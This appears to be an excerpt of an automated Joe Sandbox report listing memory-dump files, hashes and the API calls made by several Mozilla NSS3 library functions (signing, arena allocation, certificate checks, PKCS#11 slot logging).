Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: memcmpstrlen$strcmp
String ID: $OQyl$manufacturer$model$serial$token
API String ID: 2407968032-2449266256
Opcode ID: e63e1299f0f71f4dfb6db2212a4fdb1dd91327a74a7a6b6df505e8ddda6d2c06
Instruction ID: 6e030a02c4a0b1df8f85baa049b28581f38cf1612cd4d9d853bf425382707386
Opcode Fuzzy Hash: e63e1299f0f71f4dfb6db2212a4fdb1dd91327a74a7a6b6df505e8ddda6d2c06
Instruction Fuzzy Hash: 7802D0A1F0C3CA6EF7318722DA8CBD52AE05B1531CF4D25F5CA4D4BA93D2AC49899353

Function 6C7BEDD0 Relevance: 21.2, APIs: 14, Instructions: 239memoryCOMMON

Download Yara Rule

APIs

PORT_Alloc_Util.NSS3(?), ref: 6C7BEE0B

Part of subcall function 6C7D0BE0: malloc.MOZGLUE(6C7C8D2D,?,00000000,?), ref: 6C7D0BF8
Part of subcall function 6C7D0BE0: TlsGetValue.KERNEL32(6C7C8D2D,?,00000000,?), ref: 6C7D0C15

PR_SetError.NSS3(FFFFE013,00000000), ref: 6C7BEEE1

Part of subcall function 6C7B1D50: TlsGetValue.KERNEL32(00000000,-00000018), ref: 6C7B1D7E
Part of subcall function 6C7B1D50: EnterCriticalSection.KERNEL32(?), ref: 6C7B1D8E
Part of subcall function 6C7B1D50: PR_Unlock.NSS3(?), ref: 6C7B1DD3

TlsGetValue.KERNEL32 ref: 6C7BEE51
EnterCriticalSection.KERNEL32(?), ref: 6C7BEE65
PR_Unlock.NSS3(?), ref: 6C7BEEA2
free.MOZGLUE(?), ref: 6C7BEEBB
PR_SetError.NSS3(00000000,00000000), ref: 6C7BEED0
PR_Unlock.NSS3(?), ref: 6C7BEF48
free.MOZGLUE(?), ref: 6C7BEF68
PR_SetError.NSS3(00000000,00000000), ref: 6C7BEF7D
PK11_DoesMechanism.NSS3(?,?), ref: 6C7BEFA4
free.MOZGLUE(?), ref: 6C7BEFDA
PR_SetError.NSS3(FFFFE040,00000000), ref: 6C7BF055
free.MOZGLUE(?), ref: 6C7BF060

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Errorfree$UnlockValue$CriticalEnterSection$Alloc_DoesK11_MechanismUtilmalloc
String ID:
API String ID: 2524771861-0
Opcode ID: 8034aef395cdf0d80c23a7cc3d7ff3324e6022aa23a75d88642181effa17d4e3
Instruction ID: f40c75c7d403bf1e4fb6683cfb4846f901048a5a0a10af57ab979adbe410b002
Opcode Fuzzy Hash: 8034aef395cdf0d80c23a7cc3d7ff3324e6022aa23a75d88642181effa17d4e3
Instruction Fuzzy Hash: 54814FB5A00209AFEB109FA5DD45ADE77B9BF08318F544074F909A7B11E731E924CBE1

Function 6C784CF0 Relevance: 21.2, APIs: 14, Instructions: 237memoryCOMMON

Download Yara Rule

APIs

PK11_SignatureLen.NSS3(?), ref: 6C784D80
PORT_Alloc_Util.NSS3(00000000), ref: 6C784D95
PORT_NewArena_Util.NSS3(00000800), ref: 6C784DF2
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C784E2C
PR_SetError.NSS3(FFFFE028,00000000), ref: 6C784E43
PORT_NewArena_Util.NSS3(00000800), ref: 6C784E58
SGN_CreateDigestInfo_Util.NSS3(00000001,?,?), ref: 6C784E85
DER_Encode_Util.NSS3(?,?,6C8D05A4,00000000), ref: 6C784EA7
PK11_SignWithMechanism.NSS3(?,-00000001,00000000,?,?), ref: 6C784F17
DSAU_EncodeDerSigWithLen.NSS3(?,?,?), ref: 6C784F45
SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C784F62
PORT_FreeArena_Util.NSS3(?,00000001), ref: 6C784F7A
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C784F89
SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C784FC8

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Util$Arena_$ErrorFreeItem_K11_WithZfree$Alloc_CreateDigestEncodeEncode_Info_MechanismSignSignature
String ID:
API String ID: 2843999940-0
Opcode ID: 0129e0cec2f8436e51a6cd100d3e88383dbd44b224626c21e379fed43f78a82d
Instruction ID: ac262cbec8a4569b5b20c569ac3139ab1b32e701c8abf289d83737bc8e4b4ae3
Opcode Fuzzy Hash: 0129e0cec2f8436e51a6cd100d3e88383dbd44b224626c21e379fed43f78a82d
Instruction Fuzzy Hash: BE81B471909301AFE711CF28DA54B5BB7E8AB84318F15893DFA58DB641E770EA04CB92

Function 6C780470 Relevance: 21.2, APIs: 14, Instructions: 206timeCOMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000800), ref: 6C7804B7

Part of subcall function 6C7D0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C7787ED,00000800,6C76EF74,00000000), ref: 6C7D1000
Part of subcall function 6C7D0FF0: PR_NewLock.NSS3(?,00000800,6C76EF74,00000000), ref: 6C7D1016
Part of subcall function 6C7D0FF0: PL_InitArenaPool.NSS3(00000000,security,6C7787ED,00000008,?,00000800,6C76EF74,00000000), ref: 6C7D102B

PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C780539

Part of subcall function 6C7D1200: TlsGetValue.KERNEL32(00000000,00000000,00000000,?,6C7788A4,00000000,00000000), ref: 6C7D1228
Part of subcall function 6C7D1200: EnterCriticalSection.KERNEL32(B8AC9BDF), ref: 6C7D1238
Part of subcall function 6C7D1200: PL_ClearArenaPool.NSS3(00000000,00000000,00000000,00000000,00000000,?,6C7788A4,00000000,00000000), ref: 6C7D124B
Part of subcall function 6C7D1200: PR_CallOnce.NSS3(6C8D2AA4,6C7D12D0,00000000,00000000,00000000,?,6C7788A4,00000000,00000000), ref: 6C7D125D
Part of subcall function 6C7D1200: PL_FreeArenaPool.NSS3(00000000,00000000,00000000), ref: 6C7D126F
Part of subcall function 6C7D1200: free.MOZGLUE(00000000,?,00000000,00000000), ref: 6C7D1280
Part of subcall function 6C7D1200: PR_Unlock.NSS3(00000000,?,?,00000000,00000000), ref: 6C7D128E
Part of subcall function 6C7D1200: DeleteCriticalSection.KERNEL32(0000001C,?,?,?,00000000,00000000), ref: 6C7D129A
Part of subcall function 6C7D1200: free.MOZGLUE(00000000,?,?,?,00000000,00000000), ref: 6C7D12A1

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C78054A
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C78056D
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C7805CA
DER_GeneralizedTimeToTime_Util.NSS3(?,?), ref: 6C7805EA
PR_SetError.NSS3(FFFFE00C,00000000), ref: 6C7805FD
PR_SetError.NSS3(FFFFE07E,00000000), ref: 6C780621
PR_EnterMonitor.NSS3 ref: 6C78063E
PR_ExitMonitor.NSS3 ref: 6C780668
CERT_DestroyCertificate.NSS3(?), ref: 6C780697
PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C7806AC
PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C7806CC
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C7806DA

Part of subcall function 6C77E6B0: PORT_ArenaMark_Util.NSS3(00000000,?,00000000,?,?,6C7804DC,?,?), ref: 6C77E6C9
Part of subcall function 6C77E6B0: PORT_ArenaAlloc_Util.NSS3(00000000,00000088,?,?,00000000,?,?,6C7804DC,?,?), ref: 6C77E6D9
Part of subcall function 6C77E6B0: memset.VCRUNTIME140(00000000,00000000,00000088,?,?,?,?,00000000,?,?,6C7804DC,?,?), ref: 6C77E6F4
Part of subcall function 6C77E6B0: SECOID_SetAlgorithmID_Util.NSS3(00000000,00000000,00000004,00000000,?,?,?,?,?,?,?,00000000,?,?,6C7804DC,?), ref: 6C77E703
Part of subcall function 6C77E6B0: CERT_FindCertIssuer.NSS3(?,?,6C7804DC,0000000B,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C77E71E

Part of subcall function 6C77F660: PR_EnterMonitor.NSS3(6C78050F,?,00000001,?,?,?), ref: 6C77F6A8
Part of subcall function 6C77F660: PR_Now.NSS3(?,?,?,00000001,?,?,?), ref: 6C77F6C1
Part of subcall function 6C77F660: PR_ExitMonitor.NSS3(?,?,?,00000001,?,?,?), ref: 6C77F7C8

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Util$ArenaArena_ErrorFree$Monitor$EnterPool$CriticalExitSectionfree$AlgorithmAlloc_CallCertCertificateClearDeleteDestroyFindGeneralizedInitIssuerLockMark_OnceTimeTime_UnlockValuecallocmemset
String ID:
API String ID: 2470852775-0
Opcode ID: 1b2964dc7ed28b9641a464dbbc4925aec8081ef0083f051ffc6b2015875cebc4
Instruction ID: cfd86ec0db00c402065cc29410dc2d74e21bdb8992c523601b1aa5e8d8eb4dda
Opcode Fuzzy Hash: 1b2964dc7ed28b9641a464dbbc4925aec8081ef0083f051ffc6b2015875cebc4
Instruction Fuzzy Hash: F261C271A063429FEB10DE68CE44F5B77E4AF84358F104538FA5997B91E730E918CBA2

Function 6C7B8F40 Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON

Download Yara Rule

APIs

SECOID_GetAlgorithmTag_Util.NSS3(6C7B9582), ref: 6C7B8F5B

Part of subcall function 6C7CBE30: SECOID_FindOID_Util.NSS3(6C78311B,00000000,?,6C78311B,?), ref: 6C7CBE44

PORT_NewArena_Util.NSS3(00000800), ref: 6C7B8F6A

Part of subcall function 6C7D0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C7787ED,00000800,6C76EF74,00000000), ref: 6C7D1000
Part of subcall function 6C7D0FF0: PR_NewLock.NSS3(?,00000800,6C76EF74,00000000), ref: 6C7D1016
Part of subcall function 6C7D0FF0: PL_InitArenaPool.NSS3(00000000,security,6C7787ED,00000008,?,00000800,6C76EF74,00000000), ref: 6C7D102B

SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6C7B8FC3
PK11_GetIVLength.NSS3(-00000001), ref: 6C7B8FE0
SEC_ASN1DecodeItem_Util.NSS3(?,?,6C89D820,6C7B9576), ref: 6C7B8FF9
DER_GetInteger_Util.NSS3(?), ref: 6C7B901D
PORT_ZAlloc_Util.NSS3(?), ref: 6C7B903E
SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C7B9062
memcpy.VCRUNTIME140(00000024,?,?), ref: 6C7B90A2
PORT_ZAlloc_Util.NSS3(?), ref: 6C7B90CA
memcpy.VCRUNTIME140(00000018,?,?), ref: 6C7B90F0
PR_SetError.NSS3(FFFFE006,00000000), ref: 6C7B912D
free.MOZGLUE(00000000), ref: 6C7B9136
PORT_FreeArena_Util.NSS3(?,00000001), ref: 6C7B9145

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Util$Tag_$AlgorithmAlloc_Arena_Findmemcpy$ArenaDecodeErrorFreeInitInteger_Item_K11_LengthLockPoolcallocfree
String ID:
API String ID: 3626836424-0
Opcode ID: 41e1abcde59acf8510e88ab6da4e11d6fa06e667cd3f1dfbf6e13308ee14cabf
Instruction ID: fcd3cc7da95981baf9e0a37aeb1a48ee6cb67be424829861df0b0a52c8d15df9
Opcode Fuzzy Hash: 41e1abcde59acf8510e88ab6da4e11d6fa06e667cd3f1dfbf6e13308ee14cabf
Instruction Fuzzy Hash: F751D3B1A042019BE710CF28DE8579AB7F8EFA4358F054939E858A7741E731E949CBD2

Function 6C7A25C0 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 94COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_GetSlotList), ref: 6C7A25DD
PR_LogPrint.NSS3( pulCount = 0x%p,?), ref: 6C7A262A

Part of subcall function 6C8809D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 6C880BAB
Part of subcall function 6C8809D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C880BBA
Part of subcall function 6C8809D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C880D7E

PR_LogPrint.NSS3( pSlotList = 0x%p,?), ref: 6C7A260F

Part of subcall function 6C8809D0: OutputDebugStringA.KERNEL32(?), ref: 6C880B88
Part of subcall function 6C8809D0: memcpy.VCRUNTIME140(?,?,00000000), ref: 6C880C5D
Part of subcall function 6C8809D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,?,?), ref: 6C880C8D
Part of subcall function 6C8809D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C880C9C
Part of subcall function 6C8809D0: OutputDebugStringA.KERNEL32(?), ref: 6C880CD1
Part of subcall function 6C8809D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 6C880CEC
Part of subcall function 6C8809D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C880CFB
Part of subcall function 6C8809D0: OutputDebugStringA.KERNEL32(00000000), ref: 6C880D16
Part of subcall function 6C8809D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000001,00000000,?), ref: 6C880D26
Part of subcall function 6C8809D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C880D35
Part of subcall function 6C8809D0: OutputDebugStringA.KERNEL32(0000000A), ref: 6C880D65
Part of subcall function 6C8809D0: fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,?), ref: 6C880D70
Part of subcall function 6C8809D0: _PR_MD_UNLOCK.NSS3(?), ref: 6C880D90
Part of subcall function 6C8809D0: free.MOZGLUE(00000000), ref: 6C880D99

PR_LogPrint.NSS3( tokenPresent = 0x%x,?), ref: 6C7A25F6

Part of subcall function 6C8809D0: PR_Now.NSS3 ref: 6C880A22
Part of subcall function 6C8809D0: PR_ExplodeTime.NSS3(00000000,?,?,?), ref: 6C880A35
Part of subcall function 6C8809D0: PR_snprintf.NSS3(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?), ref: 6C880A66
Part of subcall function 6C8809D0: PR_GetCurrentThread.NSS3 ref: 6C880A70
Part of subcall function 6C8809D0: PR_snprintf.NSS3(?,000001FF,%ld[%p]: ,00000000,00000000), ref: 6C880A9D
Part of subcall function 6C8809D0: PR_vsnprintf.NSS3(-FFFFFDF0,000001FF,?,?), ref: 6C880AC8
Part of subcall function 6C8809D0: PR_vsmprintf.NSS3(?,?), ref: 6C880AE8
Part of subcall function 6C8809D0: EnterCriticalSection.KERNEL32(?), ref: 6C880B19
Part of subcall function 6C8809D0: OutputDebugStringA.KERNEL32(00000000), ref: 6C880B48
Part of subcall function 6C8809D0: _PR_MD_UNLOCK.NSS3(?), ref: 6C880C76
Part of subcall function 6C8809D0: PR_LogFlush.NSS3 ref: 6C880C7E

PR_LogPrint.NSS3( *pulCount = 0x%x,?), ref: 6C7A2699
PR_LogPrint.NSS3( slotID[%d] = %x,00000000,?), ref: 6C7A26C5

Strings

pSlotList = 0x%p, xrefs: 6C7A260A
tokenPresent = 0x%x, xrefs: 6C7A25F1
pulCount = 0x%p, xrefs: 6C7A2625
C_GetSlotList, xrefs: 6C7A25D8
slotID[%d] = %x, xrefs: 6C7A26C0
*pulCount = 0x%x, xrefs: 6C7A2694

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Print$DebugOutputStringfflush$fwrite$R_snprintf$CriticalCurrentEnterExplodeFlushR_vsmprintfR_vsnprintfSectionThreadTimefputcfreememcpy
String ID: *pulCount = 0x%x$ pSlotList = 0x%p$ pulCount = 0x%p$ slotID[%d] = %x$ tokenPresent = 0x%x$C_GetSlotList
API String ID: 2625801553-2918917633
Opcode ID: 80d19f6cc3e92faa8820178f02c3c59ce6d7147ce2feb2abb81170b6ac4c14a8
Instruction ID: 25cc5b1b6de24b67e215c3fdca2f0cd5b85b02c4182b0bdfda49d291e15f3737
Opcode Fuzzy Hash: 80d19f6cc3e92faa8820178f02c3c59ce6d7147ce2feb2abb81170b6ac4c14a8
Instruction Fuzzy Hash: 29318D31203184AFDB20CF99DE8CA5577A5AB8631DF048475E91887E23DB34BC56CBA1

Function 6C76AF30 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 93COMMON

Download Yara Rule

APIs

PR_EnterMonitor.NSS3 ref: 6C76AF47

Part of subcall function 6C839090: TlsGetValue.KERNEL32 ref: 6C8390AB
Part of subcall function 6C839090: TlsGetValue.KERNEL32 ref: 6C8390C9
Part of subcall function 6C839090: EnterCriticalSection.KERNEL32 ref: 6C8390E5
Part of subcall function 6C839090: TlsGetValue.KERNEL32 ref: 6C839116
Part of subcall function 6C839090: LeaveCriticalSection.KERNEL32 ref: 6C83913F

FreeLibrary.KERNEL32(?), ref: 6C76AF6D
free.MOZGLUE(?), ref: 6C76AFA4
free.MOZGLUE(?), ref: 6C76AFAA
PR_ExitMonitor.NSS3 ref: 6C76AFB5
PR_LogPrint.NSS3(%s decr => %d,?,?), ref: 6C76AFF5
PR_ExitMonitor.NSS3 ref: 6C76B005
PR_SetError.NSS3(FFFFE89D,00000000), ref: 6C76B014
PR_LogPrint.NSS3(Unloaded library %s,?), ref: 6C76B028
PR_SetError.NSS3(FFFFE89D,00000000), ref: 6C76B03C

Strings

%s decr => %d, xrefs: 6C76AFF0
Unloaded library %s, xrefs: 6C76B023

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: MonitorValue$CriticalEnterErrorExitPrintSectionfree$FreeLeaveLibrary
String ID: %s decr => %d$Unloaded library %s
API String ID: 4015679603-2877805755
Opcode ID: ec1d55b486e61a68d2c94b9a238fcfbf982350191a2ce754796746c0bd1187ef
Instruction ID: c1cba8cf3b10c5ecde05c4ae6f1c2633f81e5b0bef7d25c923de4ca9ab5942c3
Opcode Fuzzy Hash: ec1d55b486e61a68d2c94b9a238fcfbf982350191a2ce754796746c0bd1187ef
Instruction Fuzzy Hash: A531F7B5A04121ABE7219F66EE44A96B7B5EF0532CB184535EC0597E01E732FC14CBE2

Function 6C7C8680 Relevance: 21.1, APIs: 14, Instructions: 91stringCOMMON

Download Yara Rule

APIs

calloc.MOZGLUE(00000001,00000028,00000000,-00000001,?,00000000,?,6C7755D0,00000000,00000000), ref: 6C7C868B
PR_NewLock.NSS3(00000000,00000000), ref: 6C7C86A0

Part of subcall function 6C8398D0: calloc.MOZGLUE(00000001,00000084,6C760936,00000001,?,6C76102C), ref: 6C8398E5

PR_NewCondVar.NSS3(00000000,00000000,00000000), ref: 6C7C86B2

Part of subcall function 6C75BB80: calloc.MOZGLUE(00000001,00000084,00000000,00000040,?,6C7621BC), ref: 6C75BB8C

PR_NewCondVar.NSS3(00000000,?,00000000,00000000), ref: 6C7C86C8

Part of subcall function 6C75BB80: PR_SetError.NSS3(FFFFE890,00000000), ref: 6C75BBEB
Part of subcall function 6C75BB80: InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,000005DC), ref: 6C75BBFB
Part of subcall function 6C75BB80: GetLastError.KERNEL32 ref: 6C75BC03
Part of subcall function 6C75BB80: PR_SetError.NSS3(FFFFE8AA,00000000), ref: 6C75BC19
Part of subcall function 6C75BB80: free.MOZGLUE(00000000), ref: 6C75BC22

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00000000,00000000), ref: 6C7C86E2
malloc.MOZGLUE(00000001,?,?,?,00000000,00000000), ref: 6C7C86EC
strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,00000000,00000000), ref: 6C7C8700
DeleteCriticalSection.KERNEL32(-0000000C,?,?,00000000,00000000), ref: 6C7C871F
free.MOZGLUE(00000000,?,?,00000000,00000000), ref: 6C7C8726
DeleteCriticalSection.KERNEL32(?,?,?,?,00000000,00000000), ref: 6C7C8743
free.MOZGLUE(?,?,?,?,00000000,00000000), ref: 6C7C874A
DeleteCriticalSection.KERNEL32(-0000001C,?,00000000,00000000), ref: 6C7C8759
free.MOZGLUE(00000000,?,00000000,00000000), ref: 6C7C8760
free.MOZGLUE(00000000,00000000,00000000), ref: 6C7C876C

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: free$CriticalSection$DeleteErrorcalloc$Cond$CountInitializeLastLockSpinmallocstrcpystrlen
String ID:
API String ID: 1802479574-0
Opcode ID: 7450bb28e0b31d296325e4d18bf6766c6a74bfadbe81041562cf89db161f5e34
Instruction ID: 8f160fb043a175a4257d18fe88e9b2e42b5a6acec444e0df19d88101bf0791ad
Opcode Fuzzy Hash: 7450bb28e0b31d296325e4d18bf6766c6a74bfadbe81041562cf89db161f5e34
Instruction Fuzzy Hash: 8E2194F5B006026BEB10AFB99D0D95B3AA8AF412997140535F82AC7B42FB31D525C7A2

Function 6C7B6C30 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 58stringCOMMON

Download Yara Rule

APIs

strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm:,00000004,6C7B781D,00000000,6C7ABE2C,?,6C7B6B1D,?,?,?,?,00000000,00000000,6C7B781D), ref: 6C7B6C40
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,sql:,00000004,?,?,?,?,?,?,?,00000000,00000000,6C7B781D,?,6C7ABE2C,?), ref: 6C7B6C58
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,rdb:,00000004,?,?,?,?,?,?,?,?,?,?,00000000,00000000,6C7B781D), ref: 6C7B6C6F
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,extern:,00000007), ref: 6C7B6C84
PR_GetEnvSecure.NSS3(NSS_DEFAULT_DB_TYPE), ref: 6C7B6C96

Part of subcall function 6C761240: TlsGetValue.KERNEL32(00000040,?,6C76116C,NSPR_LOG_MODULES), ref: 6C761267
Part of subcall function 6C761240: EnterCriticalSection.KERNEL32(?,?,?,6C76116C,NSPR_LOG_MODULES), ref: 6C76127C
Part of subcall function 6C761240: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,6C76116C,NSPR_LOG_MODULES), ref: 6C761291
Part of subcall function 6C761240: PR_Unlock.NSS3(?,?,?,?,6C76116C,NSPR_LOG_MODULES), ref: 6C7612A0

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm), ref: 6C7B6CAA

Strings

extern:, xrefs: 6C7B6C7E
rdb:, xrefs: 6C7B6C69
NSS_DEFAULT_DB_TYPE, xrefs: 6C7B6C91
sql:, xrefs: 6C7B6C52
dbm:, xrefs: 6C7B6C3A
dbm, xrefs: 6C7B6CA4

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: strncmp$CriticalEnterSectionSecureUnlockValuegetenvstrcmp
String ID: NSS_DEFAULT_DB_TYPE$dbm$dbm:$extern:$rdb:$sql:
API String ID: 4221828374-3736768024
